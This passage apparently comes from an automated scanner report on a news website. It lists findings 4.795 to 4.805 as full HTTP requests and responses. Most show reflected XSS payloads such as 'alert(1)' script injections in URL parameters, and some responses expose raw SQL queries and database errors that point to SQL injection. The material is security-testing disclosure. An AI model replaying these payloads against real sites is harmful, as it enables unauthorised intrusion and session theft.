Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2640
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Side/521f5</script><script>alert(1)</script>224f4942aaawalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageUR
...[SNIP]...

4.795. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73056</script><script>alert(1)</script>1e86b062507 was submitted in the program_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2689
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
ia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
       
           
           tmObj.start('4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507'); // Set in Acudeo Console
           
           // 49ee2ce0476b3 -- incl bottom companion ad
</script>
...[SNIP]...

4.796. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc846"><script>alert(1)</script>a2e44a869d6 was submitted in the program_id parameter. This input was echoed as cc846\"><script>alert(1)</script>a2e44a869d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269cc846"><script>alert(1)</script>a2e44a869d6&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2677
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269cc846\"><script>alert(1)</script>a2e44a869d6_p.js">
...[SNIP]...

4.797. http://www.bostonherald.com/mediacenter/video.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aa21</script><script>alert(1)</script>b29dc7874f2 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2759
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script>
...[SNIP]...

4.798. http://www.bostonherald.com/mediacenter/video.php [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51c2</script><script>alert(1)</script>07de356f883 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalkb51c2</script><script>alert(1)</script>07de356f883 snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:02:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
p://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Sidewalkb51c2</script><script>alert(1)</script>07de356f883");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","
...[SNIP]...

4.799. http://www.bostonherald.com/mediacenter/video.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e143d"><script>alert(1)</script>a9e85fd0010 was submitted in the width parameter. This input was echoed as e143d\"><script>alert(1)</script>a9e85fd0010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370e143d"><script>alert(1)</script>a9e85fd0010&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2533
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w370e143d\"><script>alert(1)</script>a9e85fd0010xh300">
...[SNIP]...

4.800. http://www.bostonherald.com/news/politics/view.bg [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff39a'-alert(1)-'96f43005832 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/politics/view.bg?articleid=1312665&format=emailff39a'-alert(1)-'96f43005832 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312665&format=emailff39a'-alert(1)-'96f43005832'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

4.801. http://www.bostonherald.com/news/regional/view.bg [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf1d'-alert(1)-'71a4876b0f9 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/regional/view.bg?articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

4.802. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4bca(a)57e0d5026f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/cambridge/?f4bca(a)57e0d5026f9=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 502
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?f4bca(a)57e0d5026f9=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4bca(a)57e0d5026f9=1 LIMIT 0,20' at line
...[SNIP]...

4.803. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c00b'-alert(1)-'f86646641f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/cambridge/?5c00b'-alert(1)-'f86646641f6=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 529
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.804. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0b5'-alert(1)-'a16c453c05d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/mass_pike/?4f0b5'-alert(1)-'a16c453c05d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

4.805. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

Summary

